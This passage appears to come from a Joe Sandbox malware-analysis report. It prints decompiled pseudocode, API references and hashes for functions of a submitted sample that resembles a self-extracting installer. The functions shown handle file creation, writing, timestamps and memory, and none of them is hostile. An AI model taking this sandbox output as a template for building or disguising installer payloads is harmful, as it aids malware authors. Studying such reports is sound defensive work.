				struct _FILETIME _v12;
				struct _FILETIME _v20;
				FILETIME* _t14;
				int _t15;
				signed int _t21;

				_t21 = __ecx * 0x18;
				if( *((intOrPtr*)(_t21 + 0xbc8d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
					L5:
					return 0;
				} else {
					_t14 =  &_v12;
					_t15 = SetFileTime( *(_t21 + 0xbc8d74), _t14, _t14, _t14); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 1;
				}
			}








                                                                                                                                                                                                        0x00bc4c40
                                                                                                                                                                                                        0x00bc4c4a
                                                                                                                                                                                                        0x00bc4c8d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc4c70
                                                                                                                                                                                                        0x00bc4c70
                                                                                                                                                                                                        0x00bc4c7e
                                                                                                                                                                                                        0x00bc4c86
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc4c8a

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00BC4C54
                                                                                                                                                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00BC4C66
                                                                                                                                                                                                        • SetFileTime.KERNELBASE(?,?,?,?), ref: 00BC4C7E
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Time$File$DateLocal
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2071732420-0
                                                                                                                                                                                                        • Opcode ID: 45b4875524907a125c6e1e32b6864f6a10e6fcc2c174e97f7cc0846ffdbe35a2
                                                                                                                                                                                                        • Instruction ID: f3b8e5737adf416798d3df8350f65713ab83b63642e21460b83ac17f1cfc80b6
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 45b4875524907a125c6e1e32b6864f6a10e6fcc2c174e97f7cc0846ffdbe35a2
                                                                                                                                                                                                        • Instruction Fuzzy Hash: CDF06D7260120CBF9B249FA5CC59EBB77ECEB09345B48056EA816D2060EB30DA14C7B0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC487A Relevance: 3.1, APIs: 2, Instructions: 59fileCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                                        			E00BC487A(CHAR* __ecx, signed int __edx) {
				void* _t7;
				CHAR* _t11;
				long _t18;
				long _t23;

				_t11 = __ecx;
				asm("sbb edi, edi");
				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
				if((__edx & 0x00000100) == 0) {
					asm("sbb esi, esi");
					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
				} else {
					if((__edx & 0x00000400) == 0) {
						asm("sbb esi, esi");
						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
					} else {
						_t23 = 1;
					}
				}
				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
				if(_t7 != 0xffffffff || _t23 == 3) {
					return _t7;
				} else {
					E00BC490C(_t11);
					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
				}
			}







                                                                                                                                                                                                        0x00bc4880
                                                                                                                                                                                                        0x00bc488c
                                                                                                                                                                                                        0x00bc4894
                                                                                                                                                                                                        0x00bc48a0
                                                                                                                                                                                                        0x00bc48c9
                                                                                                                                                                                                        0x00bc48ce
                                                                                                                                                                                                        0x00bc48a2
                                                                                                                                                                                                        0x00bc48a8
                                                                                                                                                                                                        0x00bc48b7
                                                                                                                                                                                                        0x00bc48bc
                                                                                                                                                                                                        0x00bc48aa
                                                                                                                                                                                                        0x00bc48ac
                                                                                                                                                                                                        0x00bc48ac
                                                                                                                                                                                                        0x00bc48a8
                                                                                                                                                                                                        0x00bc48de
                                                                                                                                                                                                        0x00bc48e7
                                                                                                                                                                                                        0x00bc490b
                                                                                                                                                                                                        0x00bc48ee
                                                                                                                                                                                                        0x00bc48f0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc4902

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00BC4A23,?,00BC4F67,*MEMCAB,00008000,00000180), ref: 00BC48DE
                                                                                                                                                                                                        • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00BC4F67,*MEMCAB,00008000,00000180), ref: 00BC4902
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                                                        • Opcode ID: 007de0bda2d562d8ad2b4610da47f0c13a56d05c814a4c045add4c5b63cda68f
                                                                                                                                                                                                        • Instruction ID: 44c7e58ef88eb2026ba374e1851d7279775e20d625b850c37313939eadd06275
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 007de0bda2d562d8ad2b4610da47f0c13a56d05c814a4c045add4c5b63cda68f
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E4016DA3E115742AF32441294C99FB7559CCBDA734F1B0378BDEAF71D1DA644D0481E0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC4AD0 Relevance: 3.0, APIs: 2, Instructions: 47fileCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E00BC4AD0(signed int _a4, void* _a8, long _a12) {
				signed int _t9;
				int _t12;
				signed int _t14;
				signed int _t15;
				void* _t20;
				struct HWND__* _t21;
				signed int _t24;
				signed int _t25;

				_t20 =  *0xbc858c; // 0x268
				_t9 = E00BC3680(_t20);
				if( *0xbc91d8 == 0) {
					_push(_t24);
					_t12 = WriteFile( *(0xbc8d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
					if(_t12 != 0) {
						_t25 = _a12;
						if(_t25 != 0xffffffff) {
							_t14 =  *0xbc9400; // 0x51c07
							_t15 = _t14 + _t25;
							 *0xbc9400 = _t15;
							if( *0xbc8184 != 0) {
								_t21 =  *0xbc8584; // 0x0
								if(_t21 != 0) {
									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0xbc93f8, 0);
								}
							}
						}
					} else {
						_t25 = _t24 | 0xffffffff;
					}
					return _t25;
				} else {
					return _t9 | 0xffffffff;
				}
			}











                                                                                                                                                                                                        0x00bc4ad5
                                                                                                                                                                                                        0x00bc4adb
                                                                                                                                                                                                        0x00bc4ae7
                                                                                                                                                                                                        0x00bc4aee
                                                                                                                                                                                                        0x00bc4b05
                                                                                                                                                                                                        0x00bc4b0d
                                                                                                                                                                                                        0x00bc4b14
                                                                                                                                                                                                        0x00bc4b1a
                                                                                                                                                                                                        0x00bc4b1c
                                                                                                                                                                                                        0x00bc4b21
                                                                                                                                                                                                        0x00bc4b2a
                                                                                                                                                                                                        0x00bc4b2f
                                                                                                                                                                                                        0x00bc4b31
                                                                                                                                                                                                        0x00bc4b39
                                                                                                                                                                                                        0x00bc4b54
                                                                                                                                                                                                        0x00bc4b54
                                                                                                                                                                                                        0x00bc4b39
                                                                                                                                                                                                        0x00bc4b2f
                                                                                                                                                                                                        0x00bc4b0f
                                                                                                                                                                                                        0x00bc4b0f
                                                                                                                                                                                                        0x00bc4b0f
                                                                                                                                                                                                        0x00bc4b5e
                                                                                                                                                                                                        0x00bc4ae9
                                                                                                                                                                                                        0x00bc4aed
                                                                                                                                                                                                        0x00bc4aed

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00BC3680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00BC369F
                                                                                                                                                                                                          • Part of subcall function 00BC3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00BC36B2
                                                                                                                                                                                                          • Part of subcall function 00BC3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00BC36DA
                                                                                                                                                                                                        • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00BC4B05
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1084409-0
                                                                                                                                                                                                        • Opcode ID: de071b1454fc42d8138beacc66e0166feb87ad8a221d0a87985751f18808b5d7
                                                                                                                                                                                                        • Instruction ID: d2945f131c537c039c3b7412b0dc03d0b8fdf62357d2225abd027bf092c40681
                                                                                                                                                                                                        • Opcode Fuzzy Hash: de071b1454fc42d8138beacc66e0166feb87ad8a221d0a87985751f18808b5d7
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 28019231240205ABE7148F58EC19FA27799F748726F0882A9FA39A71E0CF70DD11CB50
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC658A Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00BC658A(char* __ecx, void* __edx, char* _a4) {
				intOrPtr _t4;
				char* _t6;
				char* _t8;
				void* _t10;
				void* _t12;
				char* _t16;
				intOrPtr* _t17;
				void* _t18;
				char* _t19;

				_t16 = __ecx;
				_t10 = __edx;
				_t17 = __ecx;
				_t1 = _t17 + 1; // 0xbc8b3f
				_t12 = _t1;
				do {
					_t4 =  *_t17;
					_t17 = _t17 + 1;
				} while (_t4 != 0);
				_t18 = _t17 - _t12;
				_t2 = _t18 + 1; // 0xbc8b40
				if(_t2 < __edx) {
					_t19 = _t18 + __ecx;
					if(_t19 > __ecx) {
						_t8 = CharPrevA(__ecx, _t19); // executed
						if( *_t8 != 0x5c) {
							 *_t19 = 0x5c;
							_t19 =  &(_t19[1]);
						}
					}
					_t6 = _a4;
					 *_t19 = 0;
					while( *_t6 == 0x20) {
						_t6 = _t6 + 1;
					}
					return E00BC16B3(_t16, _t10, _t6);
				}
				return 0x8007007a;
			}












                                                                                                                                                                                                        0x00bc6592
                                                                                                                                                                                                        0x00bc6594
                                                                                                                                                                                                        0x00bc6596
                                                                                                                                                                                                        0x00bc6598
                                                                                                                                                                                                        0x00bc6598
                                                                                                                                                                                                        0x00bc659b
                                                                                                                                                                                                        0x00bc659b
                                                                                                                                                                                                        0x00bc659d
                                                                                                                                                                                                        0x00bc659e
                                                                                                                                                                                                        0x00bc65a2
                                                                                                                                                                                                        0x00bc65a4
                                                                                                                                                                                                        0x00bc65a9
                                                                                                                                                                                                        0x00bc65b2
                                                                                                                                                                                                        0x00bc65b6
                                                                                                                                                                                                        0x00bc65ba
                                                                                                                                                                                                        0x00bc65c3
                                                                                                                                                                                                        0x00bc65c5
                                                                                                                                                                                                        0x00bc65c8
                                                                                                                                                                                                        0x00bc65c8
                                                                                                                                                                                                        0x00bc65c3
                                                                                                                                                                                                        0x00bc65c9
                                                                                                                                                                                                        0x00bc65cc
                                                                                                                                                                                                        0x00bc65d2
                                                                                                                                                                                                        0x00bc65d1
                                                                                                                                                                                                        0x00bc65d1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc65dc
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CharPrevA.USER32(00BC8B3E,00BC8B3F,00000001,00BC8B3E,-00000003,?,00BC60EC,00BC1140,?), ref: 00BC65BA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CharPrev
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 122130370-0
                                                                                                                                                                                                        • Opcode ID: cc3300d49a111ca121a23592a6743a361e48da724a8288e099e23ef74eb920a4
                                                                                                                                                                                                        • Instruction ID: 500fa09462b2ee63d25098fc4e17b0d4095733a6eec0a04da56ce80b7558cb11
                                                                                                                                                                                                        • Opcode Fuzzy Hash: cc3300d49a111ca121a23592a6743a361e48da724a8288e099e23ef74eb920a4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: FEF042725042545BD331051D9884F66BFDDDBEA350F3801EEE8DAD3205DA554C4583A0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC621E Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E00BC621E() {
				signed int _v8;
				char _v268;
				signed int _t5;
				void* _t9;
				void* _t13;
				void* _t19;
				void* _t20;
				signed int _t21;

				_t5 =  *0xbc8004; // 0x9f7d84ca
				_v8 = _t5 ^ _t21;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					0x4f0 = 2;
					_t9 = E00BC597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
				} else {
					E00BC44B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
					 *0xbc9124 = E00BC6285();
					_t9 = 0;
				}
				return E00BC6CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
			}











                                                                                                                                                                                                        0x00bc6229
                                                                                                                                                                                                        0x00bc6230
                                                                                                                                                                                                        0x00bc6247
                                                                                                                                                                                                        0x00bc626a
                                                                                                                                                                                                        0x00bc6272
                                                                                                                                                                                                        0x00bc6249
                                                                                                                                                                                                        0x00bc6255
                                                                                                                                                                                                        0x00bc625f
                                                                                                                                                                                                        0x00bc6264
                                                                                                                                                                                                        0x00bc6264
                                                                                                                                                                                                        0x00bc6284

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00BC623F
                                                                                                                                                                                                          • Part of subcall function 00BC44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00BC4518
                                                                                                                                                                                                          • Part of subcall function 00BC44B9: MessageBoxA.USER32(?,?,photo660,00010010), ref: 00BC4554
                                                                                                                                                                                                          • Part of subcall function 00BC6285: GetLastError.KERNEL32(00BC5BBC), ref: 00BC6285
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 381621628-0
                                                                                                                                                                                                        • Opcode ID: 7b8c2733f3872bb6ac7097ee7c8625858cfda9c09af8bafa97216a89e2a609f1
                                                                                                                                                                                                        • Instruction ID: 7edb0448fa18341c40fe7aaf979474f53b87f94d330bab4b6872e483d8c28e30
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7b8c2733f3872bb6ac7097ee7c8625858cfda9c09af8bafa97216a89e2a609f1
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2BF0BEB0600208ABE760EB748D06FBA33ECDB58300F4000AEA986DB191EEB499848650
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC4B60 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00BC4B60(signed int _a4) {
				signed int _t9;
				signed int _t15;

				_t15 = _a4 * 0x18;
				if( *((intOrPtr*)(_t15 + 0xbc8d64)) != 1) {
					_t9 = FindCloseChangeNotification( *(_t15 + 0xbc8d74)); // executed
					if(_t9 == 0) {
						return _t9 | 0xffffffff;
					}
					 *((intOrPtr*)(_t15 + 0xbc8d60)) = 1;
					return 0;
				}
				 *((intOrPtr*)(_t15 + 0xbc8d60)) = 1;
				 *((intOrPtr*)(_t15 + 0xbc8d68)) = 0;
				 *((intOrPtr*)(_t15 + 0xbc8d70)) = 0;
				 *((intOrPtr*)(_t15 + 0xbc8d6c)) = 0;
				return 0;
			}





                                                                                                                                                                                                        0x00bc4b66
                                                                                                                                                                                                        0x00bc4b74
                                                                                                                                                                                                        0x00bc4b98
                                                                                                                                                                                                        0x00bc4ba0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc4bac
                                                                                                                                                                                                        0x00bc4ba4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc4ba4
                                                                                                                                                                                                        0x00bc4b78
                                                                                                                                                                                                        0x00bc4b7e
                                                                                                                                                                                                        0x00bc4b84
                                                                                                                                                                                                        0x00bc4b8a
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00BC4FA1,00000000), ref: 00BC4B98
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2591292051-0
                                                                                                                                                                                                        • Opcode ID: 87b96cc55a14af5444cfbbee965797e5026149ff463b544e938cd9425555d6e6
                                                                                                                                                                                                        • Instruction ID: fc737ce1a54f59691b0813fe2f81da95fbbeee337941f22959760662eabf415b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 87b96cc55a14af5444cfbbee965797e5026149ff463b544e938cd9425555d6e6
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F7F0FE71600B089E87618E399C00F53BBE4EAB6B613160D3E946FD2190DB30A945CBA0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC66AE Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00BC66AE(CHAR* __ecx) {
				unsigned int _t1;

				_t1 = GetFileAttributesA(__ecx); // executed
				if(_t1 != 0xffffffff) {
					return  !(_t1 >> 4) & 0x00000001;
				} else {
					return 0;
				}
			}




                                                                                                                                                                                                        0x00bc66b1
                                                                                                                                                                                                        0x00bc66ba
                                                                                                                                                                                                        0x00bc66c7
                                                                                                                                                                                                        0x00bc66bc
                                                                                                                                                                                                        0x00bc66be
                                                                                                                                                                                                        0x00bc66be

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(?,00BC4777,?,00BC4E38,?), ref: 00BC66B1
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                                                        • Opcode ID: 8078ce2b14f5cffdb8cd6cf71abaa3e350055493171253c378ebcfa95feed538
                                                                                                                                                                                                        • Instruction ID: da81f1fe12b11479d3ad0f935a66fcb8684d977a170b83ceac1225e1afacfd2e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8078ce2b14f5cffdb8cd6cf71abaa3e350055493171253c378ebcfa95feed538
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 59B09276222444426A2006716C29E962981E6C123A7E41BA4F032C11E0CE3ED846E004
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC4CA0 Relevance: 1.3, APIs: 1, Instructions: 8memoryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00BC4CA0(long _a4) {
				void* _t2;

				_t2 = GlobalAlloc(0, _a4); // executed
				return _t2;
			}




                                                                                                                                                                                                        0x00bc4caa
                                                                                                                                                                                                        0x00bc4cb1

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GlobalAlloc.KERNELBASE(00000000,?), ref: 00BC4CAA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AllocGlobal
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3761449716-0
                                                                                                                                                                                                        • Opcode ID: 6103d15c53a3b65e51fde66215f4a1ac2e75cd194889f289be229b0c1c8eb1b6
                                                                                                                                                                                                        • Instruction ID: c6d600ae0667af0f8e10d7fba96dd9cccee285870a7174053f22d87475b3d1f6
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6103d15c53a3b65e51fde66215f4a1ac2e75cd194889f289be229b0c1c8eb1b6
                                                                                                                                                                                                        • Instruction Fuzzy Hash: CDB0123204420CB7CF001FC2EC09F857F1DE7C87A5F140000F60C460508E72941086A6
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00BC4CC0 Relevance: 1.3, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00BC4CC0(void* _a4) {
				void* _t2;

				_t2 = GlobalFree(_a4); // executed
				return _t2;
			}




                                                                                                                                                                                                        0x00bc4cc8
                                                                                                                                                                                                        0x00bc4ccf

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FreeGlobal
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2979337801-0
                                                                                                                                                                                                        • Opcode ID: f26f088ba9dd6752a02d7525606eab526ae511adea40f978842ae7aa8381f9ae
                                                                                                                                                                                                        • Instruction ID: bf37640af9961244d9369a9db137ce7db6b58544154150dca42caf88840663e4
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f26f088ba9dd6752a02d7525606eab526ae511adea40f978842ae7aa8381f9ae
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 29B0123100010CB78F001B42EC08C457F1DD6C42A47000010F50C420218F3398118595
